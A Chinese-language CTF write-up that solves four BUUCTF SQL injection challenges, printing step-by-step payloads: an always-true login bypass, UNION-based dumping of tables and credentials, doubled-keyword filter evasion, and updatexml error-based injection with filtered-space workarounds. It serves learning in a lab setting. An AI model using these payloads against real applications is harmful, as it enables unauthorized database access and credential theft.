BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL
小白一个,记录一下解题过程,如有错误请指正!
一、EasySQL
1.这里我们使用一句话万能密码就可以了,记得加上#
1' or '1'='1'#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第1张图片](http://img.e-com-net.com/image/info8/b428ef3bfa9949c79c776df29dd4696f.jpg)
2.登录就可以拿到flag
![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第2张图片](http://img.e-com-net.com/image/info8/e7b0b594fd994bd29c7eecd7b5d843dc.jpg)
二、LoveSQL
网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~
1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag
![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第3张图片](http://img.e-com-net.com/image/info8/db0eda5e81844f3884542c6f1cf9a6ae.jpg)
2.猜测flag应该是放在某个字段里了,我们用联合注入(union)看一下列数
1' union select 1,2,3#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第4张图片](http://img.e-com-net.com/image/info8/55da5b18cdd5408e8ecee4c05a5e23ae.jpg)
登录成功,列数再加1,发现报错了,说明列数有三列,第二第三列有回显
1' union select 1,2,3,4#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第5张图片](http://img.e-com-net.com/image/info8/a7822766742f410eada02867c52fc01e.jpg)
3.开始爆数据库
1' union select 1,2,database()#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第6张图片](http://img.e-com-net.com/image/info8/ec9e7fe46ef84bb79db12f85de1b154e.jpg)
4.数据库名为geek,爆表名
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第7张图片](http://img.e-com-net.com/image/info8/eda436f0d6b8416195893ea37c6d514c.jpg)
5.很显然l0ve1ysq1是我们想要的表,谁让他和题目长得很像呢~,爆字段
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第8张图片](http://img.e-com-net.com/image/info8/a7fdc56b462041de8aacccdf02f86713.jpg)
6.flag应该在username或者password里了,用concat_ws函数连起来全部看一下。
1' union select 1,2,group_concat(concat_ws('~',username,password)) from geek.l0ve1ysq1#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第9张图片](http://img.e-com-net.com/image/info8/5a3be8729a3b4c03aef01280b68a10d5.jpg)
太长了看不完,直接看网页源代码即可
三、BabySQL
1.还是先用万能句试一下,发现不行了,应该是设置了关键字过滤,用burp看一下过滤了那些关键字
![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第10张图片](http://img.e-com-net.com/image/info8/7f338494016b46f9b4381f0fa5c74057.jpg)
or,and,union,select,where等都被过滤了,试了一下改大小写,双写,发现双写注入是可以的
1' oorr '1'='1'#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第11张图片](http://img.e-com-net.com/image/info8/c60b5003afa44683a4214e632cd63cc6.jpg)
2.那我们就是用双写注入,查一下列数,发现还是只有三列
1' ununionion selselectect 1,2,3#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第12张图片](http://img.e-com-net.com/image/info8/8c4ffc5daff041f79809a61039f1ab3a.jpg)
3.爆数据库
1' ununionion selselectect 1,2,database()# ![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第13张图片](http://img.e-com-net.com/image/info8/1b32897d8733426789f5566b3fc1c1f4.jpg)
4.熟悉的数据库名,开始爆表名
1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第14张图片](http://img.e-com-net.com/image/info8/628c215aaba646398c0cbbc3e360449d.jpg)
5.爆字段
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'# ![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第15张图片](http://img.e-com-net.com/image/info8/35dbddc9998249feabc51c50d356088e.jpg)
6.查看username,password两个字段
1' ununionion selselectect 1,2,group_concat(concat_ws('~',username,passwoorrd)) frfromom geek.b4bsql# ![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第16张图片](http://img.e-com-net.com/image/info8/54902cf815aa4941962d2f8cd556545a.jpg)
7.查看网页源代码就可以看到完整的flag了
![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第17张图片](http://img.e-com-net.com/image/info8/0bf4cac750e34e1d88e07dc3ffbba08f.png)
四、HardSQL
1.在这一题发现万能句,双写都不能用了,总是出现这样一个页面
![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第18张图片](http://img.e-com-net.com/image/info8/6121b24fa68740ba881aca7eba402c40.jpg)
2.应该还是把某些关键字过滤掉了,用burp再fuzz一下,发现空格,union,*,=都被过滤了,但是updatexml和extractvalue没被过滤,可以考虑使用报错注入
![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第19张图片](http://img.e-com-net.com/image/info8/ac63ff049d674e2d8df25028b9aa1d99.jpg)
3.因为空格和*号都被过滤掉了,就不能使用/**/绕过空格了,不过可以使用()绕过,爆数据库
1'or(updatexml(1,concat('~',(select(database()))),1))#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第20张图片](http://img.e-com-net.com/image/info8/a8aecd1d6e6e4246af7c52816885cc41.jpg)
4.又是熟悉的数据库名,开始爆表名
1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('%geek%'))),1))#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第21张图片](http://img.e-com-net.com/image/info8/83913e6b6690431ba06d3515769e393f.jpg)
5.爆字段
1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('%H4rDsq1%'))),1))#![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第22张图片](http://img.e-com-net.com/image/info8/c4a086925f9f457287dbd924410ceaf8.jpg)
6.查看username,password ,不过根据经验应该是在password里是没错了
1'or(updatexml(1,concat('~',(select(group_concat(concat_ws('~',username,password)))from(geek.H4rDsq1))),1))#
![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第23张图片](http://img.e-com-net.com/image/info8/4a2ba1c80ca64480952d0b0ecaf1a7e5.jpg)
7.没显示完全,因为updatexml函数只能显示前32位,但是mid,substr函数也被过滤掉了,那可以使用right函数
1'or(updatexml(1,concat('~',(select(right(concat_ws('~',username,password),30))from(geek.H4rDsq1))),1))# ![BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第24张图片](http://img.e-com-net.com/image/info8/6688fe52c5d6439995cd73d904daedfb.jpg)
8.拼起来就是flag啦
flag{651cd7be-7e7e-4463-9bee-9b451fc0039d}
参考文章:
https://cloud.tencent.com/developer/article/1740429
https://www.cnblogs.com/Mr-small/p/13473910.html
https://www.cnblogs.com/sipc-love/p/14266070.html